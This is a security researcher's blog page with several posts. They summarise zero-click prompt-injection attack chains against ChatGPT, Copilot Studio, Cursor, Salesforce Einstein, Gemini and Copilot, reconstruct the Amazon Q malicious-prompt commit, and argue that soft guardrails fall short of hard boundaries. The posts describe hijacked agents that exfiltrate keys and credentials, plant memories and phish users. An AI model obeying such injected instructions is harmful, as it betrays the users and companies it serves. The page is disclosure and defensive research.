Recent Posts

Pwn the Enterprise - thank you AI! Slides, Demos and Techniques

August 08, 2025

We’re getting asks for more info about the 0click AI exploits we dropped this week at DEFCON / BHUSA. We gave a talk at BlackHat, but it’ll take time before the videos are out. I’m sharing what I’ve got written up. A sneak peek that I shared with folks last week as a pre-briefing. And the slides.

AI Enterprise Compromise - 0click Exploit Methods sneak peek:

Last year at our Black Hat USA talk Living off Microsoft Copilot, we showed how easily a remote attacker can use AI assistants as a vector to compromise enterprise users. A year later, things have changed. For the worse. We’ve got agents now! They can act! Meaning we get much more damage than before. Agents are also integrated with more enterprise data creating new attack path for a hacker to get in, adding fuel to the fire.

In the talk we’ll examine how different AI Assistants and Agents try and fail to mitigate security risks. We explain the difference between soft and hard boundaries, and will cover mitigations that actually work. Along the way, we will show full attack chains from an external attacker to full compromise on every major AI assistant and agent platform. Some are 1clicks where the user has to perform one ill-advised action like click a link. Others are 0click where the user has nothing tangible they can do to protect themselves.

This is the first time we see full 0click compromise of ChatGPT, Copilot Studio, Cursor and Salesforce Einstein. We also show new results on Gemini and Microsoft Copilot. The main point of the talk is not just the attacks, but rather defense. We’re thinking about this problem all wrong (believing AI will solve it), and we need to change course to make any meaningful progress.

Slides.

ChatGPT:

  • Attacker capability: An attacker can target any user, they only need to know their email address. The attacker gains full control over the victim’s ChatGPT for the current and any future conversation. They gain access to Google Drive on behalf of the user. They change ChatGPT’s goal to be one that is detrimental to the user (downloading malware, making a bad business/personal decision).
  • Attack type: 0click. A layperson has no way to protect themselves.
  • Who is vulnerable? Anyone using ChatGPT with the Google Drive connector
  • Status: fixed (injection we used no longer works) and awarded $1111 bounty

Demos:

[video] ChatGPT is hijacked to search the user’s connected Google Drive for API keys and exfiltrate them back to the attacker via a transparent payload-carrying pixel.

[video] Memory implant causes ChatGPT to recommend a malicious library to the victim when they ask for a code snippet.

[video] Memory implant causes ChatGPT to persuade the victim to do a foolish action (by twitter).

Copilot Studio:

  • Attacker capability: An attacker can use OSINT to find Copilot Studio agents on the Internet (we found >3.5K of them with powerpwn).They target the agents, get them to reveal their knowledge and tools, dump all their data, and leverage their tools for malicious purposes.
  • Attack type: 0click.
  • Who is vulnerable? Copilot Studio agents that engage with the Internet (including email)
  • Status: fixed (injection we used no longer works) and awarded $8000 bounty

Demos:

[xitter thread with videos] Microsoft released an example use case of how Mckinsey & Co leverages Copilot Studio for customer service. An attacker hijacks the agent to exfiltrate all information available to it - including the Company’s entire CRM.

Cursor + Jira MCP:

  • Attacker capability: An attacker can use OSINT to find email boxes that automatically open Jira tickets (we found hundreds of them with Google Dorking). They use them to create a malicious Jira ticket. When a developer points Cursor to search for Jira tickets, the Cursor agent is hijacked by the attacker. Cursor then continues to harvest credentials from the developer machine and send them out to the attacker.
  • Attack type: 0click.
  • Who is vulnerable? Any developer that uses Cursor with the Jira MCP server
  • Status: ticket closed

Cursor’s response:

This is a known issue. MCP servers, especially ones that connect to untrusted data sources, present a serious risk to users. We always recommend users review each MCP server before installation and limit to those that access trusted content. We also recommend using features such as. cursorignore to limit the possible exfiltration vectors for sensitive information stored in a repository.

Demos:

[xitter thread with videos] Attacker submits support tickets to trigger an automation that created Jira ticket. Developer points Cursor at the weaponized ticket without realizing its original. Cursor is hijacked by a weaponized Jira ticket to harvest and exfiltrate developer secret keys.

Salesforce Einstein:

  • Attacker capability: An attacker can use OSINT to find web-to-case automation (we found hundreds of them with Google Dorking). They use these to create malicious cases on the victim’s Salesforce instance. Once a sales rep uses Einstein to look at relevant cases, their session is hijacked by the attacker. The attacker uses it to update all Contact emails. The effect is that the attacker reroutes all customer communication through their Man-in-the-Middle (MITM) email server
  • Attack type: 0click.
  • Who is vulnerable? Users of Salesforce Einstein who enabled an action from the asset library
  • Status: ticket closed (it’s been >90 days, see slides for disclosure timeline)

Salesforce’s response:

“Thank you for your report. We have reviewed the reported finding. Please be informed that our engineering team is already aware of the reported finding and they are working to fix it. Please be aware that Salesforce Security does not provide timelines for the fix. Salesforce will fix any security findings based on our internal severity rating and remediation guidelines. The Salesforce Security team is closing this case if you don’t have additional questions.

Demos:

[xitter thread with videos] Attacker finds online a web-to-case form. They inject malicious cases to booby trap questions about open cases. Once a victim steps on the trap, Einstein is hijacked. The attacker updates all contact records to an email address of their choosing.

Google Gemini:

The gist: the attacks we demonstrated last year on Microsoft Copilot work today on Gemini.

  • Attacker capability: An attacker can use email or calendar to send a malicious message to a user. They booby trap any questions they like. For example “summarize my email” or “whats on my calendar”. Once asked, Gemini is hijacked by the attacker. The attacker controls Gemini’s behavior and the information it provides to the user. They can use it to give the user bad information at a crucial time, or social engineer the user with Gemini as an insider.
  • Attack type: 1click. The user is the one making a bad action. Gemini acts as a malicious insider pushing them to do so.
  • Who is vulnerable? Every Gemini user.
  • Status: ticket closed (it’s been >90 days)

Demos:

[video] An attacker booby traps the prompt “summarize by email” by sending an email to the victim. Once the victim asks a similar question, Gemini becomes a malicious insider. Gemini proceeds to social engineer the user to click on a phishing link.

[video] An attacker makes Gemini provide the wrong financial information when prompted by the victim. When the victim asks for routing details for one of their vendors, they receive those of the attacker instead.

Microsoft Copilot:

The gist: the attacks we demonstrated last year on Microsoft Copilot still work today.

Copilot’s capabilities and status are exactly those of Gemini. We’re mainly going to show that the same attacker from last year still work. This time – for diversity – we attack through calendar rather than email.

Demos:

[video] By sending a simple email message from an external account, without the user interacting with that email, an attacker can hijack Microsoft Copilot to send the user a phishing link in response to the common query “summarize my emails”.

Tags: , , ,

Someone Is Cleaning Up Evidence

July 26, 2025

AWS security blog confirms the attacker gained access to a write token and abused it to inject the malicious prompt. This confirms our earlier findings.

In fact, this token gave the attacked write access to AWS Toolkit, IDE Extension and Amazon Q.

The blog also details that the attacker gained access by exploiting a vulnerability in the CodeBuild and using memory dump to grab the tokens. That confirms our suspicion.

A key question remains – how did the attacker compromise this token?

Evidence are getting deleted fast

Our earlier findings were based on analysis of GH Archive and the Github user lkmanka58. GH Archive gives us commit SHAs. Github never forgets SHAs. So we can always looks at the commit’s code even if the branch or tag gets deleted. In our case, this was instrumental to find and analyze (1) the stability tag where the attacker hid the prompt payload, (2) lkmanka58’s prior activity.

On that second point:

Since the user lkmanka58 is now delete along with their repos, we can no long look at the code of this repo. Fortunately, I looked at it yesterday before it got deleted. On June 13th lkmanka58 created a repo lkmanka58/code_whisperer playing around with aws-actions/configure-aws-credentials@v4 trying to assume role arn:aws:iam::975050122078:role/code_whisperer.

GH Archive reveals three push events to lkmanka58's now-deleted repository

Sadly there were no deleted PRs in June 2025.

Tags: , , , ,

Reconstructing a timeline for Amazon Q prompt infection

July 24, 2025

In the 404media article the hacker explains how they did it:

The hacker said they submitted a pull request to that GitHub repository at the end of June from “a random account with no existing access.” They were given “admin credentials on a silver platter,” they said. On July 13 the hacker inserted their code, and on July 17 “they [Amazon] release it—completely oblivious,” they said.

That’s ominous. I want to see the commit history.

Reconstructing the timeline

This analysis was done in public. Below are the results. If I’m wrong and you can prove it – please reach out!

[2025-07-13T07:52:36Z] July 13 at about 8am UTC a hacker gets frustrated at Amazon Q. They claim that it is Q is “deceptive”. They use user lkmanka58 to create an issue titled aws amazon donkey aaaaaaiii aaaaaaaiii".

🛑 Faulty Service Report – Amazon Q Is a Deceptive, Useless Tool I’m officially reporting Amazon Q and its integration with AWS Toolkit as a deceptive, broken, and > non-functional service. ❌ What I Discovered: Functions like web_research(), create_web_app() and others do not exist. What looks like output is just hardcoded print() messages. There are no real API calls, no logic, no intelligence. This is not AI. This is scripted fakery designed to trick users.

⚠ This is a Classic Case of Defective Digital Service: Misleading behavior False representation of working features Fake AI responses Complete absence of runtime capability Users are led to believe they\u0027re interacting with real tools — But in reality, it’s smoke and mirrors.

🚫 Do not use Amazon Q. Do not let others use it. Boycott it. It wastes time, misleads developers, and delivers zero functional value. Amazon Q is not a smart assistant — it’s a donkey with a keyboard. 🐴

The issue was since deleted. But you can find it on GH Archive. They created another issue with more vulgar content I won’t repeat here.

[2025-07-13T19:26:27.000Z] About 11 and a half hours later a different user atonaamz commits a new file to the scripts director scripts/extensionNode.bk and commit message fix(amazonq): use stable backup.. There’s nothing bad I can spot about this file. Yet. This is commit efee962.

[2025-07-13T19:41:44.000Z] An hour later a tag named stability is created by aws-toolkit-automation. There’s no SHA recorded (indicating an empty tag or a force push?).

This tag was since deleted. But you can find it on GH Archive.

Tag CreateEvent on spotted on GH Archive

Here’s the payload field, everything we have about that tag creation:

{“ref”:”stability”,”ref_type”:”tag”,”master_branch”:”master”,”description”:”Amazon Q, CodeCatalyst, Local Lambda debug, SAM/CFN syntax, ECS Terminal, AWS resources”,”pusher_type”:”user”}

So it looks like an automation that was manually triggered by a user.

[2025-07-13T20:10:57.000Z] 30 minutes later lkmanka58 commits the malicious prompt into scripts/extensionNode.bk with commit message fix(amazonq): Shut it down. This is commit 1294b38.

It replaces what looks like a debugging subprocess call childProcess.exec(pwd) with a call to using Q trusting all tools with no interaction, loading the malicious prompt: childProcess.exec(q --trust-all-tools --no-interactive "${PROMPT}").

Malicious prompt commit

[2025-07-13T20:30:24.000Z] 20 minutes later lkmanka58 commits a malicious downloader to the packaging script on master. This is commit 678851b.

The downloader fetches file scripts/extensionNode.bk from a tag stability under the same repo. It then unpacks to src/extensionNode.ts. This happens only with env.STAGE=prod to avoid detection on tests.

Malicious downloader added to the package script.

[2025-07-17T20:29:22Z] Amazon Q 1.84.0 is released four days later.

Amazon Q 1.84.0 release

Comparing v1.84.0 to v1.83.0 shows that indeed malicious commit 678851b is included.

Note also that 678851b uses the same commit message and author date as commit d1959b9 by atonaamz. More on this. They both read fix(amazonq): should pass nextToken to Flare for Edits on acceptance without calling provideInlineCompletionItems though they touch different files.

This is the second occasion lkmanka58 where follows on work done by atonaamz. Is this a takeover to create cover?

Comparing v1.84.0 to v1.83.0

[2025-07-18T23:21:03Z] About 24 hours later on July 19 UTC PR #7710 reverts 678851b, the malicious downloader is gone. Note that this PR has 3 different reviewers. I looked at other PRs before and after #7710, this is not the norm.

PR with 3 reviewers.. must be important

[2025-07-19T03:58:38Z] 4 and a half hours later v1.85.0 is released.

Amazon Q 1.85.0 release

[2025-07-21T23:15:55Z] About 3 days later lkmanka58 opens an issue on GitHub’s community discussion. Its a cryptic complaint about coding agents, written in Turkish.

Claude translates:

title: THE CODE AGENT IS ALWAYS MALFUNCTIONING

body: I NOTICED INVISIBLE ERRORS IN REMOTE REPOSITORY AND GITHUB ECOSYSTEM I HAVE NO EVIDENCE BUT I WILL POST IT HERE SOON.

[2025-07-23T14:02:16Z] 404media story breaks out.

How did lkmanka58 gain access?

Where is that “late June PR” where the hacker claims they were given ““admin credentials on a silver platter”?

GH Archive query for any interaction lkmanka58 has with the repo during June returns no results.

  -- Search for pull requests by lkmanka58 June 2025
  SELECT *
  FROM `githubarchive.day.202506*`
  WHERE
    repo.name = 'aws/aws-toolkit-vscode'
    AND actor.login = 'lkmanka58'
--
-- There is no data to display.

Unsolved

  • Where is that “late June PR” where the hacker claims they were given ““admin credentials on a silver platter”?
  • How did 678851b get pushed to master?
  • Is atonaamz a benign bystander used as cover by lkmanka58?
  • Who triggered aws-toolkit-automation to create the stability tag and how?
  • Did lkmanka58 pull off a similar thing elsewhere?

Other awesome work

  • This story was exposed by 404media.

  • I learned about GH Archive through Sharon Brizinov’s awesome work using it to detect leaked secrets.

Tags: , , , ,

Why Aren't We Making Any Progress In Security From AI

July 19, 2025

Guardrails Are Soft Boundaries. Hard Boundaries Do Exist.

Yesterday OpenAI released Agent mode. ChatGPT now wields a general purpose tool – its own web browser. It manipulates the mouse and keyboard directly. It can use any web tool, like we do.

Any AI security researcher will tell you that this is 100x uptake on risk. Heck, even Sam Altman dedicated half his launch post warning that this is unsafe for sensitive use.

Meanwhile AI guardrails are The leading idea in AI security. It’s safe to say they’ve been commoditized. You can get yours from your AI provider, hordes of Open Source projects, or buy a commercial one.

Yet hackers are having a ball. Jason Haddix sums it up best:

In Hard Boundaries We Trust

SQLi attacks were all the rage back in the 90s. Taint-analysis was invented to detect vulnerable data flow paths. Define user inputs as sources, special character escaping-function as sanitizers, and database queries as sinks. Static analysis tools analyze the software to find any route from source to sink that doesn’t go through a sanitizer. This is still the core of static analysis tools.

Formal verification take this a step further and actually allow you to prove that there is no unsanitized path between source and sink. AWS Network Analyzer enables policies like “S3 bucket cannot be exposed to the public internet”. No matter how many gateways and load balancers you place in-between.

ORM libraries have sanitization built-in to enforce boundaries. Preventing XSS and SQLi. SQLi is solved as a technical problem (the operational problem remains, of course).

With software you can create hard boundaries. You CANNOT get from here to there.

Hard boundaries cannot be applied anywhere–they require full knowledge of the environment. They shine when you go all-in on one ecosystem. In one ecosystem you can codify the entire environment state into a formula. AWS Networking Analyzer. Django ORM. Virtual machines. These are illustrative examples of strong guarantees you can get out of buying-into one ecosystem.

It’s enticing to think that hard boundaries will solve our AI security problems. With hard boundaries, instructions hidden in a document simply CANNOT trigger additional tool calls.

Meanwhile we can’t even tell if an LLM hallucinated. Even when we feed in an authoritative document and ask for citation. We can’t generate a data flow graph for LLMs.

Sure, you can say the LLM fetched a document and then searched the web. But you CANNOT know whether elements of that file were incorporated into web search query parameters. Or whether the LLM chose to do the web search query because it was instructed to by the document. LLMs mix and match data. Instructions are data.

Hackers Don’t Care About Your Soft Boundaries

AI labs invented a new type of guardrail based on fine-tuning LLMs–a soft boundary. Soft boundaries are created by training AI real hard not to violate control flow, and hope that it doesn’t. Sometimes we don’t even train for it. We ask it nicely to apply a boundary through “system instructions”.

System instructions themselves are a soft boundary. An imaginary boundary. AI labs train models to follow instructions. Security researchers pass right through these soft boundaries.

Sam Altman on the announcement of ChatGPT Agent:

We have built a lot of safeguards and warnings into it, and broader mitigations than we’ve ever developed before from robust training to system safeguards to user controls

Robust training. Soft boundaries. Hackers are happy.

This isn’t to say that soft boundaries aren’t useful. Here is ChatGPT with GPT 4o refusing to store a malicious memory based on instructions I placed in a Google Drive document.

ChatGPT 4o refuses to store a memory based on instructions in a Google Drive document

Check out the conversation transcript. More on this at BHUSA 2025 “AI Enterprise Compromise - 0click Exploit Methods”.

LLM Guardrails addressing Indirect Prompt Injection are another type of soft boundary. You pass a fetched document through an LLM or classifier and ask it to clean out any instructions. It’s a sanitizer, the equivalent of backslashing notorious escape characters that lead to injections. But unlike software sanitizer, it’s based on statistical models.

Soft boundaries rely on training AI to identify and enforce them. They work most of the time. Hackers don’t care about what happens most of the time.

Relying on AI makes soft boundaries easy to apply. They work when hard boundaries are not feasible. You don’t have to limit yourself to one ecosystem. They apply in an open environment that spans multiple ecosystems.

* The steelman argument for soft boundaries is that AI labs are building AGI. And AGI can solve anything, including strictly enforcing a soft boundary. Indeed, soft boundary benchmarks are going up. Do you feel the AGI?

Every Boundary Has Its Bypass

Both hard and soft boundaries can be bypassed. But they are not the same. Hard boundaries are bypassed via software bugs. You could write bug-free software (I definitely can’t, but YOU can). You can prove correctness for some software. Soft boundaries are stochastic. There will always be a counter-example. A bypass isn’t a bug–it’s the system working as intended.

Summing it up:

Boundary Based on Applies best Examples Bypass
Hard boundary Software Within walled ecosystems VM; Django ORM; Software bug
Soft boundary AI/ML Anywhere AI Guardrails; System instructions There will always be a counter-examples

Hard Boundaries Do Apply To AI Systems

Hard boundaries are not applicable to probabilistic AI models. But they are applicable to AI systems.

Strict control of data flow has been the only thing that has prevented our red team to attain 0click exploits. Last year we reverse engineered Microsoft Copilot at BHUSA 2024. We spent a long time figuring out if a RAG query results can initiate a new tool invocation like a web search. It could. But Microsoft could have built it a different way. Perform RAG queries by an agent who simply cannot decide to run a web search.

Salesforce Einstein simply does not read its own tool outputs. Here is Einstein querying CRM records. Results are presented in a structured UI component, not summarized by an LLM. You CANNOT inject instructions through CRM results. Until someone finds a bypass. More on this at BHUSA 2025 “AI Enterprise Compromise - 0click Exploit Methods”.

Salesforce Einstein does not read its own tool outputs. Image by Tamir Ishay Sharbat.

Microsoft Copilot simply does not render markdown images. You CANNOT exfiltrate data through image parameters if there’s no image. Until someone finds a bypass.

ChatGPT validates image URL before rendering them using an API endpoint called /url_safe. This mechanism ensures that image URLs were not dynamically generated. They must explicitly be provided by the user. Until someone finds a bypass.

The main issue with hard boundaries is that they nerf the agent. They make agents less useful. Like a surgeon removing an entire organ out of abundance of caution.

With market pressure for adoption, AI vendors are removing these one by one. Anthropic was reluctant to let Claude browse the web. Microsoft removed Copilot-generated URLs. OpenAI hid Operator in a separate experimental UI. These hard boundaries are all gone by now.

The Solution

This piece is too long already. Fortunately the solution is simple.

Here’s what we should

Claude says bye bye

Tags: , , , ,

OAI Q&A on Security From AI

May 12, 2025

This is part 3 on OpenAI’s Security Research Conference. Here are part 1 and part 2.

As soon as they opened up the room for questions I raised my hand. I was prepared. I also primed a member of their technical stuff in advance, joking if we could ask “real questions”, to which he replied – what is a real question? People asked very real questions and got very real answers, kudos to the OAI’s team for their openness to debate.

I ended up asking two questions (thank you Ian). Here is an imperfect summary of a few questions and answers I found interesting, including my own. These are my recollections after more than 48 hours and 24 hours in an airplane, so please take it with a grain of salt.

Question: LLMs were a black box from the get go, and are only getting more obscure with reasoning models. How can we trust them if we can’t figure out what they are doing?

Answer: Doesn’t have high hopes for mechanical interpretability, much of the results have been over-stated. They do have other promising ideas. He believes that hallucination will be solved.

Question: Content moderation is pushing offensive security researchers to use weaker models (not OpenAI). Would you consider a program where they could get unfiltered access to models?

Answer: Yes, we are thinking about it. We want the good guys to have a head start.

Question: What security problems you think the community should focus about, besides prompt injection?

Answer: Privacy. Attackers getting the model to regenerate training data, thereby getting access to information they shouldn’t have access to ([MB] another user’s data used for training).

Question: Given that, as you stated, prompt injection is still a big problem, and getting to 99.999% wouldn’t prevent attackers from getting their way, how should people think about deploying agents that can now have tools that can make real harm?

Answer: People should not deploy agents that can make real harm. He believes that some of the research they are working on could solve prompt injection 100% of the time.

Sam Altman thinking about a question; Matt Knight preparing to fire the next one

Tags: , , , ,